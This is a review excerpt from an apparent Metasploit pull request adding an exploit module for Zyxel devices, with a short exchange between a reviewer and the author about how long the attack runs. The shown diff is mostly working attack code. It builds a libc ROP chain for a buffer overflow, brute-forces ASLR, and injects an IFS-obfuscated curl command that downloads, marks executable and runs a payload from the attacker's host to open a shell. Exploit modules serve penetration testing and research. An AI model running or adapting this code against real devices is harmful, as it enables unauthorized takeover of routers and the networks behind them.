modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb

```diff
@@ -0,0 +1,240 @@
+      end
+    rescue ::Rex::ConnectionError
+      pass
+    end
+    return Exploit::CheckCode::Unknown
+  end
+
+  # Handle incoming requests from the router
+  def on_request_uri(cli, _request)
+    if !@payload_sent
+      print_good("#{peer} - Sending executable to the router")
+      print_good("#{peer} - A shell should connect soon!")
+      send_response(cli, @payload_exe)
+      @payload_sent = true
+    end
+  end
+
+  def build_buffer_overflow_url(download_cmd)
+    libc_addr = 0xb6a38000
+
+    system_offset = 0x000376c8
+    system_addr = libc_addr + system_offset
+
+    mov_offset = 0x000f4ccc
+    mov_addr = libc_addr + mov_offset
+
+    r3_offset = 0x0010bdac
+    r3_addr = r3_offset + libc_addr
+
+    sp_inc_offset = 0x000f70ec
+    sp_inc_addr = libc_addr + sp_inc_offset
+
+    overflow_url = rand_text_alpha_lower(268)
+    overflow_url += [r3_addr].pack('I')
+    overflow_url += "\xef\xbe\xad\xde" * 3
+    overflow_url += [sp_inc_addr].pack('I')
+    overflow_url += [mov_addr].pack('I')
+    overflow_url += "\xef\xbe\xad\xde"
+    overflow_url += [system_addr].pack('I')
+    overflow_url += "\xef\xbe\xad\xde" * 6
+    overflow_url += download_cmd
+    return overflow_url
+  end
+
+  def send_exploit(exploit_url)\
+    send_request_cgi({
+      'uri' => "/Export_Log?#{exploit_url}",
+      'method' => 'GET',
+      'rport' => datastore['RPORT']
+    })
+    Rex.sleep(6)
+  end
+
+  def exploit
+    if ((datastore['SRVHOST'] == '0.0.0.0') || (datastore['SRVHOST'] == '::'))
+      fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST")
+    end
+
+    print_status("Attempting to exploit #{target.name}")
+
+    srv_host = datastore['SRVHOST']
+    srv_port = datastore['SRVPORT']
+    @cmd_file = rand_text_alpha_lower(1)
+    payload_file = rand_text_alpha_lower(1)
+
+    # generate our payload executable
+    @payload_exe = generate_payload_exe
+
+    # Command that will download @payload_exe and execute it
+    download_cmd = 'curl${IFS}'
+    if datastore['SSL']
+      # https:// can't be a substring as the zyxel parser won't be able to understand the URI
+      download_cmd = 'curl${IFS}-k${IFS}https:`echo${IFS}//`'
+    end
+    download_cmd += "#{srv_host}:#{srv_port}/#{payload_file}${IFS}-o${IFS}/tmp/#{payload_file};chmod${IFS}+x${IFS}/tmp/#{payload_file};/tmp/#{payload_file};"
+
+    http_service = "#{srv_host}:#{srv_port}"
+    print_status("Starting up our web service on #{http_service} ...")
+    start_service({
+      'Uri' => {
+        'Proc' => proc do |cli, req|
+          on_request_uri(cli, req)
+        end,
+        'Path' => "/#{payload_file}"
+      }
+    })
+
+    print_status('Going to bruteforce ASLR, this will take a while...')
+
+    count = 1
+    exploit_url = build_buffer_overflow_url(download_cmd)
+    timeout = 0
+    until @payload_sent
+      print_status("Trying to overflow the buffer, attempt #{count}")
+      send_exploit(exploit_url)
```

Comment:
> The vulnerability can only be exploited from the LAN side, but does not require authentication. As ASLR is activated, the libc address will be bruteforced.
Thus the webserver will crash until successfull exploitation. On average this process takes 20 minutes.

Does this request synchronously hang for 20 minutes? 👀

Reply:
no? it doesn't hang a request synchronously for 20 mins, the "until @payload_sent" loop can take ~20 minutes or so, constantly doing send_exploit requests. it sends one attempt at a time in this loop. 

theres a check in line 235 where you can set a timeout so after (however long you set) the exploit aborts with exceeded timeout.